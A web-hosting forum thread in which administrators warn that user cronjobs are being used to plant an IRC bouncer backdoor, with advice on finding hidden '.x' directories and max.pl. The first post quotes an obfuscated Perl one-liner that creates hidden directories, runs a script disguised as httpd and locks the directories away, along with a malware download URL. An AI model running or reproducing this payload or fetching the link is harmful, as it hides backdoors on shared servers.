If you allow cronjobs

If you allow users to setup cronjobs watch for the following.

perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)


In most cases this user is an innocent victim and it is actually another user doing the real damage.

The script that is being installed is this one.

http://ibitzica.com/m.tgz

Look for this in home directories or search for the CRONEXE it is one of the variables that is setup in the php install file.

If you are seeing abnormal apache failures, extreme bandwidth usage, or suspect any backdoors or such check for this. It will be trying to setup PSYBNC.SYSTEM.PORT1=1124

So make sure your firewalls are blocking this port.

 

Good find!

Our biggest thing with this was it was able to install in two other peoples home directories.

Make sure to do good thorough search for hidden directories like .x and search for the max.pl script as well.

 

That's the lovely thing with that script, it allows that to happen.

 

Re: Re: If you allow cronjobs

Umm, neither do we, but is informing others bad thing now? Also if your using software firewalls on your server they can be taken down. Any exploit that gets through apache and can gain root can change that port. Checking your ports regularily is called being diligent with your server security.

Just because a firewall blocks it I am still not going to allow users to even try using this stuff. For us and the other clients I deal with, there is a zero tolerance for any cr@p.

If you're not checking for these types of things, firewall or not it is no wonder you seem to have an abundant more problems then most of us have encountered.

 

So, does that mean if I name a file something that belongs to another program I can run it freely on your system no matter what the code it? Cool, can I have an account with you?

Also that is not max.pl but is max.pl.html see the difference?

html versus perl = two different languages